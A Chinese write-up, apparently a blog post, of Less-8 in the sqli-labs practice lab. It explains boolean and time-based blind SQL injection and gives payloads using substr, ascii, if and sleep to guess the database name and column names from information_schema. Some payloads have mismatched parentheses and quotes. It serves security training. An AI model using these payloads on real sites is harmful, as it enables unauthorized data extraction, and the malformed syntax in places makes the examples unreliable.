SQLI DUMB SERIES-8

SQLI DUMB SERIES-8思路

?id=1'--+

构造闭合发现没有回显

则我们使用盲注

盲注分为几种 

布尔型盲注

Length() //返回字符串长度

Substr() //取字符串 用法同下

mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为AB

left() //left(ABC,2)取字符串左边的几位 返回值为AB

right() //right(ABC,2)取字符串左边的几位 返回值为BC

ord()/ascii() //返回一个字符的ASCII码/返回一个数字对应ASCII码的字符

hex() //返回16进制数 hex编码

?id=1’ and mid(database(),1,8)=‘security’--+

时间型盲注

sleep(1) //睡1秒

交互时睡1秒

不交互时不延迟

if()函数 //判断后,true返回3,false返回4

if(1=1,3,4) 返回3

if(1=2,3,4) 返回4

?id=1’ and if(1=2,1,sleep(5))—+ //判断闭合

如果1=2正确 则睡眠5S 将1=2替换成SQL语句后可盲注

id=1’ and if((length(database()>1),sleep(4),0)--+ //增加1值来猜库名的长度

id 1’ and if((ascii(substr(database(),1,1)))>1),sleep(4),0)--+ //库名

id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = ‘your table’ and table_schema = 'your database’limit 0,1),1,1))>1),sleep(4),0)--+ //表名

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

通过改变盲注的ascii码来猜库名

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值